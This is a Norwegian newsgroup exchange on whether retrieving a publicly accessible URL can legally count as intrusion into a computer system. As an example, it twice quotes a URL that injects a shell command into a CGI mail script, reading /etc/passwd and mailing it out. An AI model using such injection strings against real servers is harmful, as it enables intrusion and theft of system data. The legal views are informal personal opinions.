Johan Poppe wrote:
> Har jeg forresten gjort noe ulovlig hvis jeg bruker den adressen jeg
> har funnet? Altså: Kan jeg sies å ha "brutt meg inn" i et datasystem
> når jeg henter opp en webside som er allment tilgjengelig?
Ja, helt klart. Dersom det er alment forståelig at dette er et område
man ikke ønsker offentlig inntreden i, vil inntreden bli å betrakte som
innbrudd.
Selv om du lar døren til leiligheten stå vid åpen, er det likevel ikke
fritt frem for hvem som helst å gå inn. Om du glemmer å låse bildøren
er det likevel ikke ok for andre å gå inn i bilen og undersøke hva du
har der.
At fornærmede er skjødesløs fritar IKKE anklagede for ansvar for sine
handlinger, men vil helt sikkert frita tredjepart (f.eks. et
forsikringsselskap) for deler av ansvaret.
Selv om en konstruksjon som
"http://www.server.com/cgi-bin/mailto.cgi?to=foo%3bcat%20/etc/passwd%7cmail%20...@email.addr.es"
er en fritt tilgjengelig URL, og det er grovt skjødesløst å ha et
cgi-script og webserver som er så hjernedødt satt opp, vil det GARANTERT
bli å betrakte som ulovlig inntrengen å kalle opp en slik URL med formål
å hente ut informasjon (/etc/passwd) som er å forstå som ikke offentlig
tilgjengelig.
Likeledes er jeg temmelig sikker på at å enkelt manøvrere seg utenom en
hjernedød javascript-sperre vil bli å betrakte som innbrudd på samme
måte som om du har låst utgangsdøren med en krok i stedet for en
Yale-lås og du får uventet besøk.
Mvh,
--
*Art
[snipp]
men du får jo ikke noe forsikring om bilen ikke er låst, eller om
et vindu står åpent. men om det er ulovlig aner jeg ikke...sikkert..
Andreas
Hvordan kan jeg vite om en link er lovlig eller ikke når den er fullt
tilgjengelig? Sånn som f.eks.
http://www.server.com/cgi-bin/mailto.cgi?to=foo%3bcat%20/etc/passwd%7cmail%20...@email.addr.es
Hilsen Klaus, Marte og Siri